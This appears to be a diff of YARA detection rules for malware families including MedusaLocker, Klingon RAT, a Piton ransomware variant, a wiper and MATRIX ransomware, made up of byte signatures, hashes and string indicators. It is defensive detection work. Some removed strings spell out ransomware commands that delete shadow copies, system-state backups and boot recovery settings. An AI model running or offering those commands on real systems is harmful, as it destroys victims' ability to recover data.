+		$seq4 = { c6 85 00 ff ff ff 00 c6 85 01 ff ff ff 4b c6 85 02 ff ff ff 1f c6 85 03 ff ff ff 35 c6 85 04 ff ff ff 1f c6 85 05 ff ff ff 23 c6 85 06 ff ff ff 1f c6 85 07 ff ff ff 68 c6 85 08 ff ff ff 1f c6 85 09 ff ff ff 38 c6 85 0a ff ff ff 1f c6 85 0b ff ff ff 10 c6 85 0c ff ff ff 1f c6 85 0d ff ff ff 66 c6 85 0e ff ff ff 1f c6 85 0f ff ff ff 2a c6 85 10 ff ff ff 1f c6 85 11 ff ff ff 43 c6 85 12 ff ff ff 1f c6 85 13 ff ff ff 23 c6 85 14 ff ff ff 1f c6 85 15 ff ff ff 10 c6 85 16 ff ff ff 1f c6 85 17 ff ff ff 07 c6 85 18 ff ff ff 1f c6 85 19 ff ff ff 51 c6 85 1a ff ff ff 1f c6 85 1b ff ff ff 1c c6 85 1c ff ff ff 1f c6 85 1d ff ff ff 43 c6 85 1e ff ff ff 1f c6 85 1f ff ff ff 10 c6 85 20 ff ff ff 1f c6 85 21 ff ff ff 61 c6 85 22 ff ff ff 1f c6 85 23 ff ff ff 74 c6 85 24 ff ff ff 1f c6 85 25 ff ff ff 41 c6 85 26 ff ff ff 1f c6 85 27 ff ff ff 10 c6 85 28 ff ff ff 1f c6 85 29 ff ff ff 59 c6 85 2a ff ff ff 1f c6 85 2b ff ff ff 43 c6 85 2c ff ff ff 1f c6 85 2d ff ff ff 38 c6 85 2e ff ff ff 1f c6 85 2f ff ff ff 2b c6 85 30 }
 
 	condition:
-		uint32( 0 ) == 0x464c457f and filesize > 30KB and 4 of them
+		uint16( 0 ) == 0x5a4d and filesize > 80KB and all of ( $seq* )
 }
-rule ARKBIRD_SOLG_MAL_Stager_Vermilion_Strike_Sep_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Klingon_Jun_2021_1 : FILE
 {
 	meta:
-		description = "Detect the windows version of the stager of Vermilion Strike implant"
+		description = "Detect the Klingon RAT"
 		author = "Arkbird_SOLG"
-		id = "7a8ae258-1fb4-5a24-b69e-3a632e00bfae"
-		date = "2021-09-14"
-		modified = "2021-09-16"
-		reference = "https://www.intezer.com/blog/malware-analysis/vermilionstrike-reimplementation-cobaltstrike/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-09-15/Vermilion_Strike/MAL_Stager_Vermilion_Strike_Sep_2021_1.yara#L1-L18"
+		id = "bf114c4d-3010-5b34-954e-82794e30edcb"
+		date = "2021-06-19"
+		modified = "2021-06-21"
+		reference = "https://www.intezer.com/blog/malware-analysis/klingon-rat-holding-on-for-dear-life/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-20/Klingon/MAL_Klingon_Jun_2021_1.yara#L1-L18"
 		license_url = "N/A"
-		logic_hash = "cc4d59c92faba1f3435c8454071a1e1c60b6339393796c76e64b890bb85d13cc"
-		score = 50
+		logic_hash = "283452d24edea988dc353fada4cd1e050db244a48cc6ab30f70e1900ca9c7c2f"
+		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "3ad119d4f2f1d8ce3851181120a292f41189e4417ad20a6c86b6f45f6a9fbcfc"
-		level = "experimental"
+		hash1 = "44237e2de44a533751c0baace09cf83293572ae7c51cb4575e7267be289c6611"
+		hash2 = "c98bb0649262277ec9dd16cf27f8b06042ff552535995f2bdd3355d2adeff801"
+		hash3 = "e8eea442e148c81f116de31b4fc3d0aa725c5dbbbd840b446a3fb9793d0b9f26"
 		tlp = "White"
-		adversary = "Vermilion Strike"
+		adversary = "-"
 
 	strings:
-		$s1 = { a1 b0 62 41 00 33 c4 50 8d 84 24 d0 00 00 00 64 a3 00 00 00 00 8b da 8b 84 24 ec 00 00 00 8b b4 24 e0 00 00 00 8b bc 24 e4 00 00 00 8b ac 24 e8 00 00 00 8d 54 24 2c 52 89 44 24 28 89 4c 24 2c e8 95 f0 ff ff 33 c0 89 84 24 d8 00 00 00 c7 84 24 88 00 00 00 0f 00 00 00 89 84 24 84 00 00 00 88 44 24 74 6a 17 68 fc 3b 41 00 8d 44 24 78 c6 84 24 e0 00 00 00 01 e8 9e 0b 00 00 6a 02 68 14 3c 41 00 8d 44 24 78 e8 8e 0b 00 00 6a 00 6a 00 6a 00 6a 01 55 ff 15 44 21 41 00 8b e8 55 6a 02 57 53 8b ce 89 6c 24 2c e8 8d fc ff ff 83 c4 10 6a 00 6a 00 6a 03 6a 00 6a 00 53 56 55 ff 15 58 21 41 00 6a 00 68 00 82 80 80 6a 00 6a 00 6a 00 57 68 f8 3b 41 00 50 89 44 24 40 ff 15 4c 21 41 00 }
-		$s2 = { 64 a1 00 00 00 00 50 83 ec 60 a1 b0 62 41 00 33 c4 89 44 24 58 53 55 56 57 a1 b0 62 41 00 33 c4 50 8d 44 24 74 64 a3 00 00 00 00 8b 84 24 88 00 00 00 8b ac 24 84 00 00 00 8b f9 89 44 24 18 33 c0 8d 4c 24 1c 51 8b f2 33 db 89 44 24 30 89 44 24 34 89 44 24 38 89 44 24 3c 89 44 24 40 89 44 24 44 89 44 24 48 89 44 24 4c 89 44 24 50 89 44 24 20 89 44 24 24 89 44 24 28 89 44 24 2c ff 15 2c 21 41 00 85 c0 74 21 39 5c 24 1c 74 05 bb 01 00 00 00 8b 44 24 20 }
-		$s3 = { 50 56 8d 4c 24 58 e8 fc f2 ff ff 6a 01 8d 54 24 18 52 8d 44 24 58 50 89 9c 24 88 00 00 00 33 c0 c6 44 24 20 3d e8 0d 01 00 00 83 f8 ff 74 4f 80 bc 24 8c 00 00 00 00 74 16 56 bb 18 3c 41 00 8d 7c 24 54 e8 8f fd ff ff 83 c4 04 84 c0 75 2f 56 bb 20 3c 41 00 8d 7c 24 54 e8 79 fd ff ff 83 c4 04 84 c0 75 19 56 bb 28 3c 41 00 e8 67 fd ff ff 83 c4 04 84 c0 74 07 c7 45 00 04 00 00 00 83 7c 24 68 10 72 19 }
-		$s4 = { 8d 44 24 18 50 8d 4c 24 18 51 6a 1f 53 c7 44 24 28 04 00 00 00 ff 15 3c 21 41 00 81 4c 24 14 00 01 00 00 6a 04 8d 54 24 18 52 6a 1f 53 }
+		$seq1 = { 81 3a 70 72 6f 78 0f 85 [2] 00 00 80 7a 04 79 0f 84 [2] 00 00 48 83 f9 05 75 12 81 3a 73 68 65 6c 75 0a 80 7a 04 6c 0f 84 [2] 00 00 48 83 f9 06 75 14 81 3a 62 69 6e 61 75 0c 66 81 7a 04 72 79 0f 84 [2] 00 00 48 83 f9 03 0f 85 ?? 04 00 00 66 81 3a 63 6d 0f 85 [2] 00 00 80 7a 02 64 0f 84 [2] 00 00 48 83 f9 06 }
+		$seq2 = { 48 8d 05 [3] 00 48 89 ?? 24 [1-4] 48 c7 84 24 ?? 00 00 00 ?? 00 00 00 48 8d 0d [3] 00 48 89 ?? 24 [0-4] 48 c7 ?? 24 }
+		$seq3 = { 48 8d 0d [3] 00 48 89 8c 24 ?? 00 00 00 48 8b 94 24 ?? 00 00 00 48 89 94 24 ?? 00 00 00 48 89 8c 24 ?? 00 00 00 48 8b 94 24 ?? 00 00 00 48 89 94 24 ?? 00 00 00 48 89 8c 24 ?? 00 00 00 48 89 84 24 ?? 00 00 00 48 8d 05 [3] 00 48 89 04 24 48 c7 44 24 08 08 00 00 00 48 8d 84 24 ?? 00 00 00 48 89 44 24 10 48 c7 44 24 18 03 00 00 00 48 c7 44 24 20 03 00 00 00 e8 [3] ff 48 8b 44 24 30 48 89 44 24 58 48 8b 4c 24 28 48 89 8c 24 ?? 00 00 00 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 30KB and 3 of them
+		uint16( 0 ) == 0x5a4d and filesize > 300KB and all of ( $seq* )
 }
-rule ARKBIRD_SOLG_APT_Tardigrade_Nov_2021_1 : FILE
+rule ARKBIRD_SOLG_RAN_Piton_Nov_2021_1 : FILE
 {
 	meta:
-		description = "Detect Tardigrade loader"
+		description = "Detect Piton variant (rebuild from the Babuk leaks)"
 		author = "Arkbird_SOLG"
-		id = "f6c8014a-21dd-5ebd-9edd-7a9f649a43a0"
-		date = "2021-11-22"
-		modified = "2021-11-23"
-		reference = "https://www.isac.bio/post/tardigrade"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-22/APT_Tardigrade_Nov_2021_1.yara#L1-L19"
+		id = "433d0692-553b-5efe-84e4-134e99342fe5"
+		date = "2021-11-03"
+		modified = "2021-11-04"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-04/RAN_Piton_Nov_2021_1.yara#L1-L18"
 		license_url = "N/A"
-		logic_hash = "98358d9dbf62e653b136268d8694ed4d7f48c80125dd12ccea5f36ff5c6b4a3c"
+		logic_hash = "cd8287b3be0f8f9338cf6ba8eb24dd9a6f91a54c984a635e1103f7e6028cbf3c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "1c7c1a28921d81f672320e81ad58642ef3b8e27abf8a8e51400b98b40f49568be"
-		hash2 = "c0976a1fbc3dd938f1d2996a888d0b3a516b432a2c38d788831553d81e2f5858"
-		hash3 = "cf88926b7d5a5ebbd563d0241aaf83718b77cec56da66bdf234295cc5a91c5fe"
+		hash1 = "71936bc3ee40c7ea678889d2ad5fa7eb39401752cd58988ce462f9d4048578ac"
+		hash2 = "77c7839c7e8d4aaf52e33a2f29db8459381b5cc3b2700072305a8bae5e0762a9"
+		hash3 = "ae6020a06d2a95cbe91b439f4433e87d198547dec629ab0900ccfe17e729cff1"
 		tlp = "white"
-		adversary = "Tardigrade"
+		adversary = "RAAS"
 
 	strings:
-		$s1 = { 63 6d 64 2e 65 78 65 20 2f 63 20 65 63 68 6f 20 [10-40] 3e 22 25 73 22 26 65 78 69 74 }
-		$s2 = { 4c 89 44 24 38 89 54 24 34 48 89 4c 24 28 e8 [2] 01 00 e8 [2] 01 00 4c 8b 44 24 38 8b 54 24 34 48 8b 4c 24 28 48 83 c4 48 e9 71 fe ff ff 90 48 89 ca 48 8d 0d 76 ?? 02 00 }
-		$s3 = { 41 57 41 56 41 55 41 54 55 57 56 53 48 ?? ec [1-4] 48 8b 84 24 ?? 00 00 00 48 89 44 24 60 48 8b 05 [2] 01 00 48 89 4c 24 40 ?? 38 }
-		$s4 = { 45 31 c0 48 8d 8c 24 ?? 02 00 00 4c 8d 8c 24 ?? 01 00 00 48 8d 15 [2] 01 00 ff 15 [2] 02 00 }
+		$s1 = { 68 38 3c 40 00 6a 00 68 01 00 1f 00 ff 15 c4 50 41 00 85 c0 75 11 68 58 3c 40 00 6a 00 6a 00 ff 15 98 50 41 00 eb 0a e9 b0 00 00 00 e9 ab 00 00 00 c7 45 a8 00 00 00 00 68 78 3c 40 00 8b 55 c8 52 8b 45 e8 50 e8 86 9b ff ff 83 c4 0c 0f b6 c8 83 f9 01 75 0c 8b 55 a8 52 e8 02 f9 ff ff 83 c4 04 e8 ea 94 ff ff ff 15 04 51 41 00 89 45 c0 83 7d c0 00 74 3f b8 41 00 00 00 66 89 45 f0 eb 0c 66 8b 4d f0 66 83 c1 01 66 89 4d f0 0f b7 55 f0 83 fa 5a 7f 1f 8b 45 c0 83 e0 01 74 }
+		$s2 = { 68 80 16 40 00 ff 15 38 50 41 00 89 45 f0 68 90 16 40 00 8b 45 f0 50 ff 15 34 50 41 00 89 45 fc 83 7d fc 00 74 07 8d 4d f8 51 ff 55 fc 6a 00 6a 00 68 b0 16 40 00 68 08 17 40 00 68 18 17 40 00 6a 00 ff 15 4c 51 41 00 e8 9d 03 00 00 85 c0 74 2d 68 24 17 40 00 ff 15 38 50 41 00 89 45 ec 68 34 17 40 00 8b 55 ec 52 ff 15 34 50 41 00 89 45 f4 83 7d }
+		$s3 = { 81 ec f4 02 00 00 c7 85 7c ff ff ff 90 15 40 00 c7 45 80 98 15 40 00 c7 45 84 a0 15 40 00 c7 45 88 a8 15 40 00 c7 45 8c b0 15 40 00 c7 45 90 b8 15 40 00 c7 45 94 c0 15 40 00 c7 45 98 c8 15 40 00 c7 45 9c d0 15 40 00 c7 45 a0 d8 15 40 00 c7 45 a4 e0 15 40 00 c7 45 a8 e8 15 40 00 c7 45 ac f0 15 40 00 c7 45 b0 f8 15 40 00 c7 45 b4 00 16 40 00 c7 45 b8 08 16 40 00 c7 45 bc 10 16 40 00 c7 45 c0 18 16 40 00 c7 45 c4 20 16 40 00 c7 45 c8 28 16 40 00 c7 45 cc 30 16 40 00 c7 45 d0 38 16 40 00 c7 45 d4 40 16 40 00 c7 45 d8 48 16 40 00 c7 45 dc 50 16 40 00 c7 45 e0 58 16 40 00 c7 45 fc 00 00 00 00 c7 45 e4 78 00 00 00 c7 45 e8 00 00 00 00 c7 45 f4 00 00 00 00 eb 09 8b 45 f4 83 c0 01 89 45 f4 83 7d f4 1a 7d 35 8b 4d f4 8b 94 8d 7c ff ff ff 52 ff 15 f8 50 41 00 83 f8 01 75 1d 8b 45 fc 8b 4d f4 8b 94 8d 7c ff ff ff 89 94 85 14 ff ff ff 8b 45 fc 83 c0 01 89 45 fc eb bc b9 02 00 00 00 6b d1 00 33 c0 66 89 84 15 0c fd ff ff 68 00 00 01 00 e8 00 e8 00 00 83 c4 04 89 45 f8 83 7d f8 00 0f 84 d4 00 00 00 68 00 00 01 00 e8 e6 e7 00 00 83 c4 04 89 45 ec 83 7d ec 00 0f 84 ae 00 00 00 68 00 80 00 00 8b 4d f8 51 ff 15 08 51 41 00 89 45 f0 83 7d fc 00 76 63 8d 55 e8 52 8b 45 e4 50 8d 8d 0c fd ff ff 51 8b 55 f8 52 ff 15 f4 50 41 00 85 c0 74 26 8d 85 0c fd ff ff 50 ff 15 40 50 41 00 83 f8 03 75 14 b9 02 00 00 00 6b d1 00 33 c0 66 89 84 15 0c fd ff ff eb 22 8b 4d fc 83 e9 01 89 4d fc 8b 55 f8 52 8b 45 fc 8b 8c 85 14 ff ff ff 51 ff 15 44 50 41 00 eb 02 eb 1b 68 00 80 00 00 8b 55 f8 52 8b 45 f0 50 ff 15 00 51 41 00 85 c0 0f 85 7a ff ff ff 8b 4d f0 51 ff 15 fc 50 41 00 8b 55 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 50KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize > 30KB and all of them
 }
-rule ARKBIRD_SOLG_RAN_Medusalocker_Aug_2021_1 : FILE
+rule ARKBIRD_SOLG_WIP_Unk_Wiper_July_2021_1 : FILE
 {
 	meta:
-		description = "Detect MedusaLocker ransomware"
+		description = "Detect unknown wiper that focuses olympic games in Japan"
 		author = "Arkbird_SOLG"
-		id = "9e647371-b37a-53af-bfb6-cde72855b564"
-		date = "2021-08-08"
-		modified = "2021-08-08"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-08/medusalocker/RAN_MedusaLocker_Aug_2021_1.yara#L1-L29"
+		id = "a03d558e-399a-506e-8f37-d4907cc68d54"
+		date = "2021-07-22"
+		modified = "2021-07-22"
+		reference = "https://www.mbsd.jp/research/20210721/blog/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-22/WIP_Unk_Wiper_July_2021_1.yara#L1-L29"
 		license_url = "N/A"
-		logic_hash = "40dd3ec16eefc59cb25c8855fb62cda1d642ec711226c1c964fd26384be7ef15"
+		logic_hash = "32f66fee2547ef33121620b822f86bfdf66ff337909a56aa4f0e8ef83b6d7730"
 		score = 75
-		quality = 73
+		quality = 40
 		tags = "FILE"
-		hash1 = "4f9a833e79092006c06203a66b41fc9250bcebcee148fea404db75d52035131c"
-		hash2 = "212e7f5ed4a581b4d778dfef226738c6db56b4b4006526259392d03062587887"
-		hash3 = "a25c0227728878c386ab6dba139976cb10e853dd3cd1eb3623f236ee8e1df212"
-		hash4 = "c2a0a317d73c96428ab088a8f0636ec4ccace7ca691c84ed66a83a70183f40dc"
-		hash5 = "0abb4a302819cdca6c9f56893ca2b52856b55a0aa68a3cb8bdcd55dcc1fad9ad"
-		hash6 = "f5fb7fa5231c18f0951c755c4cb0ec07b0889b5e320f42213cbf6bbbe499ad31"
-		tlp = "white"
-		adversary = "RaaS"
+		hash1 = "295d0aa4bf13befebafd7f5717e7e4b3b41a2de5ef5123ee699d38745f39ca4f"
+		hash2 = "511fee839098dfa28dd859ffd3ece5148be13bfb83baa807ed7cac2200103390"
+		tlp = "green"
+		adversary = "Olympic Destroyer ?"
 
 	strings:
-		$s1 = "{8761ABBD-7F85-42EE-B272-A76179687C63}" fullword wide
-		$s2 = { 83 c4 08 8d 8d ?? fe ff ff e8 [2] ff ff 8d 8d ?? fe ff ff e8 [2] ff ff 68 [2] 48 00 8d 8d ?? ff ff ff e8 [2] ff ff 8b c8 e8 [2] ff ff 68 [2] 48 00 8d 8d [2] ff ff e8 [2] 00 00 8d 8d [2] ff ff 51 e8 ?? f9 ff ff 83 c4 04 88 85 2b ff ff ff 8d 8d [2] ff ff e8 [2] 00 00 0f b6 95 2b ff ff ff 85 d2 74 1e 68 [2] 48 00 8d 8d ?? ff ff ff e8 [2] ff ff 8b c8 e8 [2] ff ff 33 c0 e9 [2] 00 00 8d 4d fa e8 [2] ff ff 8d 4d fa e8 [2] 01 00 8d 4d fa e8 [2] 01 00 8d 4d fa e8 [2] 01 00 0f b6 c0 85 c0 74 0c c7 85 ?? fe ff ff [2] 48 00 eb 0a c7 85 ?? fe ff ff [2] 48 00 8b 8d ?? fe ff ff 89 8d ?? fe ff ff 8d 95 ?? fe ff ff 52 8d 8d ?? ff ff ff e8 [2] ff ff 8b c8 e8 [2] ff ff e8 ?? f8 ff ff 8d 4d 8c e8 [2] 00 00 68 [2] 48 00 8d 8d ?? ff ff ff e8 [2] ff ff 8b c8 e8 [2] ff ff b9 [2] 4a 00 e8 [2] ff ff 50 e8 [2] ff ff 83 c4 04 50 8d 4d 8c e8 [2] 00 00 0f b6 c0 85 c0 75 41 68 [2] 48 00 8d 8d ?? ff ff ff e8 [2] ff ff 8b c8 e8 [2] ff ff e8 ?? c6 ff ff c7 85 ?? fe ff ff 00 00 00 00 8d 4d 8c e8 [2] 00 00 8d 4d fa e8 [2] ff ff 8b 85 ?? fe ff ff e9 [2] 00 00 68 [2] 48 00 8d 8d ?? ff ff ff e8 [2] ff ff 8b c8 e8 [2] ff ff 68 [2] 48 00 8d 8d ?? fe ff ff e8 [2] 00 00 8d 8d ?? fd ff ff 51 8d 4d 8c e8 [2] 00 00 50 e8 [2] ff ff 83 c4 04 50 8d 95 ?? fe ff ff 52 b9 [2] 4a 00 e8 [2] 00 00 0f b6 c0 85 c0 75 0c c7 85 ?? fe ff ff 01 00 00 00 eb 0a c7 85 ?? fe ff ff 00 00 00 00 8a 8d ?? fe ff ff 88 8d 2a ff ff ff 8d 8d ?? fd ff ff e8 [2] 00 00 8d 8d ?? fe ff ff }
-		$s3 = { 62 00 63 00 64 00 65 00 64 00 69 00 74 00 2e 00 65 00 78 00 65 00 20 00 2f 00 73 00 65 00 74 00 20 00 7b 00 64 00 65 00 66 00 61 00 75 00 6c 00 74 00 7d 00 20 00 62 00 6f 00 6f 00 74 00 73 00 74 00 61 00 74 00 75 00 73 00 70 00 6f 00 6c 00 69 00 63 00 79 00 20 00 69 00 67 00 6e 00 6f 00 72 00 65 00 61 00 6c 00 6c 00 66 00 61 00 69 00 6c 00 75 00 72 00 65 00 73 }
-		$s4 = { 42 67 49 41 41 41 43 6b 41 41 42 53 55 30 45 78 }
-		$s5 = "wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest" fullword wide
-		$s6 = { 62 00 63 00 64 00 65 00 64 00 69 00 74 00 2e 00 65 00 78 00 65 00 20 00 2f 00 73 00 65 00 74 00 20 00 7b 00 64 00 65 00 66 00 61 00 75 00 6c 00 74 00 7d 00 20 00 72 00 65 00 63 00 6f 00 76 00 65 00 72 00 79 00 65 00 6e 00 61 00 62 00 6c 00 65 00 64 00 20 00 4e 00 6f }
-		$s7 = { 76 00 73 00 73 00 61 00 64 00 6d 00 69 00 6e 00 2e 00 65 00 78 00 65 00 20 00 44 00 65 00 6c 00 65 00 74 00 65 00 20 00 53 00 68 00 61 00 64 00 6f 00 77 00 73 00 20 00 2f 00 41 00 6c 00 6c 00 20 00 2f 00 51 00 75 00 69 00 65 00 74 }
-		$s8 = { 77 00 6d 00 69 00 63 00 2e 00 65 00 78 00 65 00 20 00 53 00 48 00 41 00 44 00 4f 00 57 00 43 00 4f 00 50 00 59 00 20 00 2f 00 6e 00 6f 00 69 00 6e 00 74 00 65 00 72 00 61 00 63 00 74 00 69 00 76 00 65 }
-		$s9 = { 77 00 62 00 61 00 64 00 6d 00 69 00 6e 00 20 00 44 00 45 00 4c 00 45 00 54 00 45 00 20 00 53 00 59 00 53 00 54 00 45 00 4d 00 53 00 54 00 41 00 54 00 45 00 42 00 41 00 43 00 4b 00 55 00 50 }
-		$s10 = { 33 c0 48 89 44 24 40 48 c7 44 24 48 07 00 00 00 66 89 44 24 30 44 8d 40 26 48 8d 15 [2] 09 00 48 8d 4c 24 30 e8 [2] ff ff 48 83 7c 24 40 00 74 42 4c 8d 44 24 30 48 83 7c 24 48 08 4c 0f 43 44 24 30 33 d2 b9 01 00 1f 00 ff 15 [2] 07 00 48 85 c0 75 1f 4c 8d 44 24 30 48 83 7c 24 48 08 4c 0f 43 44 24 30 33 d2 33 c9 ff 15 [2] 07 00 32 db eb 02 b3 01 48 8b 54 24 48 48 83 fa 08 72 37 48 8d 14 55 02 00 00 00 48 8b 4c 24 30 48 8b c1 48 81 fa 00 10 00 00 72 19 48 83 c2 27 48 8b 49 f8 48 2b c1 48 83 c0 f8 48 83 f8 1f 0f 87 d3 00 00 00 e8 [2] 03 00 84 db 0f 85 ad 00 00 00 e8 3e 36 00 00 84 c0 75 05 e8 c5 36 00 00 e8 ?? 94 ff ff 48 8d 1d [2] 0d 00 48 8d 4c 24 30 e8 [2] ff ff 48 8b f8 48 8d 35 [2] 0d 00 0f 1f }
+		$s1 = "\\\\.\\Global\\ProcmonDebugLogger" fullword ascii
+		$s2 = { 50 52 4f 43 4d 4f 4e 5f 57 49 4e 44 4f 57 5f 43 4c 41 53 53 00 00 00 00 4f 6c 6c 79 44 62 67 }
+		$s3 = { 8d 44 24 10 50 ff 15 08 30 40 00 50 ff 15 2c 30 40 00 83 7c 24 10 00 0f 85 76 02 00 00 33 c9 0f 1f }
+		$s4 = { 50 68 00 12 40 00 ff 15 60 30 40 00 85 c0 0f 85 ef 02 00 00 50 68 80 00 00 00 6a 03 50 6a 07 68 00 00 00 80 68 0c 32 40 00 ff 15 18 30 40 00 83 }
+		$s5 = { 8b 3d d0 30 40 00 88 84 0c e8 00 00 00 8d 84 24 e8 00 00 00 50 ff d7 83 c4 04 b0 9a 33 c9 0f 1f 00 f6 d0 88 84 0c b4 00 00 00 41 8a 81 30 32 40 }
+		$s6 = { 8b ec 83 ec 14 83 65 f4 00 8d 45 f4 83 65 f8 00 50 ff 15 34 30 40 00 8b 45 f8 33 45 f4 89 45 fc ff 15 38 30 40 00 31 45 fc ff 15 3c 30 40 00 31 45 fc 8d 45 ec 50 ff 15 40 30 40 00 8b 45 f0 8d 4d fc 33 45 ec 33 45 fc 33 }
+		$p1 = { 5c 2e 5c 47 6c 6f 62 61 6c 5c 35 84 44 65 62 75 67 4c 6f 67 67 3f }
+		$p2 = "UPX" fullword ascii
+		$p3 = { 45 6e 75 6d 57 69 6e 64 6f 77 73 }
+		$p4 = { 73 65 74 5f 6e 65 77 5f 6d 6f 64 65 00 00 00 5f 63 6f 6e 66 69 67 74 68 72 65 61 64 6c 6f 63 61 6c 65 }
+		$p5 = { 4e 75 74 6f 72 75 6e 2f 43 4e 65 74 }
+		$p6 = { 44 50 52 4f 43 4d 4f 4e 5f 57 49 4e 44 4f 57 5f 43 4c 41 53 53 }
+		$p7 = { 53 6d 61 72 74 53 6e 69 66 66 67 }
+		$p8 = { 26 30 30 63 66 67 }
+		$p9 = { 72 6f 63 65 94 48 61 63 6b }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 150KB and 9 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 200KB and ( 5 of ( $s* ) or 7 of ( $p* ) )
 }
-rule ARKBIRD_SOLG_APT_APT_34_Maildrop_Mar_2021_1 : FILE
+rule ARKBIRD_SOLG_RAN_Matrix_Sep_2020_1 : FILE
 {
 	meta:
-		description = "Detect MailDrop malware used by APT34"
+		description = "Detect MATRIX ransomware"
 		author = "Arkbird_SOLG"
-		id = "a17c4e0b-9bbb-594d-8551-5c146e6a601e"
-		date = "2021-04-03"
-		modified = "2021-04-09"
+		id = "a7df188c-e381-55e6-97e6-45f5830ff0d3"
+		date = "2020-10-15"
+		modified = "2020-10-15"
 		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-04-03/APT34/APT_APT_34_MailDrop_Mar_2021_1.yar#L1-L24"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-15/MATRIX/RAN_Matrix_Sep_2020_1.yar#L1-L28"
 		license_url = "N/A"
-		logic_hash = "f55192044bf8e190dfdc18aeaac543a5022643ea242e75ff2492939ae6e1814c"
+		logic_hash = "e832b258e8d2ee94ebbf2e715ca01960a92d723ee017261b18ce05d3095bf8a3"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "d6b876d72dba94fc0bacbe1cb45aba493e4b71572a7713a1a0ae844609a72504"
-		hash2 = "ebae23be2e24139245cc32ceda4b05c77ba393442482109cc69a6cecc6ad1393"
+		hash1 = "7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf"
+		hash2 = "afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40"
+		hash3 = "d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829"
+		hash4 = "5474b58de90ad79d6df4c633fb773053fecc16ad69fb5b86e7a2b640a2a056d6"
 
 	strings:
-		$EWSInitCom = { 7e ?? 00 00 04 28 ?? 00 00 06 ?? 4f [0-3] 02 7b ?? 00 00 04 28 ?? 00 00 06 28 ?? 00 00 06 02 7b ?? 00 00 04 6f ?? 00 00 06 02 7b ?? 00 00 04 28 ?? 00 00 06 72 ?? 00 00 70 28 ?? 00 00 0a 28 ?? 00 00 06 02 7b ?? 00 00 04 6f ?? 00 00 06 7e ?? 00 00 04 72 ?? 00 00 70 28 ?? 00 00 06 7e 06 00 00 04 28 ?? 00 00 06 [2-4] 00 00 [3-4] 00 00 [3] 00 00 [3] 00 00 [3] 00 00 }
-		$EWSCom = { 13 30 ?? 00 ?? 00 00 00 00 00 00 00 02 28 ?? 00 00 ?? 02 03 05 0e 04 0e 05 0e 06 [0-4] 73 ?? 00 00 06 7d ?? 00 00 04 04 [2-6] 00 00 ?? 02 ?? 7d ?? 00 00 04 [0-2] 02 ?? 7d ?? 00 00 04 [2-4] 00 00 [0-18] 04 02 28 ?? 00 00 06 2a }
-		$EWSDecrypt = { 13 30 03 00 27 00 00 00 ?? 00 00 11 0f 00 20 00 01 00 00 16 28 ?? 00 00 06 28 ?? 00 00 06 0a 0f 00 1f 10 16 28 ?? 00 00 06 0b 02 06 07 28 ?? 00 00 06 2a }
-		$EWSRandomData = { 1b 30 ?? 00 ?? 00 00 00 ?? 00 00 11 02 19 28 ?? 00 00 0a 0a 16 0b ?? 35 [0-3] 06 16 6a 16 6f ?? 00 00 0a 26 06 6f ?? 00 00 0a d4 8d ?? 00 00 01 0c 7e ?? 00 00 04 08 6f ?? 00 00 0a 06 08 16 06 6f ?? 00 00 0a b7 6f ?? 00 00 0a 07 17 d6 0b 07 1f 32 32 c6 [5-11] 06 6f ?? 00 00 0a dc 2a [0-1] 01 10 00 00 02 00 08 00 }
-		$s1 = "HMicrosoft Office/15.0 (Windows NT {0}; Microsoft Outlook 15.0.4675; Pro)" fullword ascii
-		$s2 = "https://{0}/ews/exchange.asmx" fullword wide
-		$s3 = "Send_Log" fullword ascii
-		$s4 = "CheckEWSConnection" fullword ascii
-		$s5 = "Done:D" fullword wide
-		$s6 = "ExecAllCmds" fullword ascii
-		$s7 = "ExchangeUri" fullword ascii
-		$s8 = "get_cmdSubject" fullword ascii
+		$debug1 = "[LDRIVES]: not found!" fullword wide
+		$debug2 = "[DONE]: NO_SHARES!" fullword wide
+		$debug3 = "[ALL_LOCAL_KID]: " fullword wide
+		$debug4 = "[FINISHED]: G=" fullword wide
+		$debug5 = "[FEX_START]" fullword wide
+		$debug6 = "[LOGSAVED]" fullword wide
+		$debug7 = "[GENKEY]" fullword wide
+		$debug8 = "[SHARES]" fullword wide
+		$debug9 = "[SHARESSCAN]: " fullword wide
+		$reg1 = { 2e 00 70 00 68 00 70 00 3f 00 61 00 70 00 69 00 6b 00 65 00 79 00 3d }
+		$reg2 = { 26 00 63 00 6f 00 6d 00 70 00 75 00 73 00 65 00 72 00 3d }
+		$reg3 = { 26 00 73 00 69 00 64 00 3d 00 }
+		$reg4 = { 26 00 70 00 68 00 61 00 73 00 65 00 3d }
+		$reg5 = { 47 00 45 00 54 }
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize > 500KB and 4 of ( $debug* ) and 3 of ( $reg* )
+}
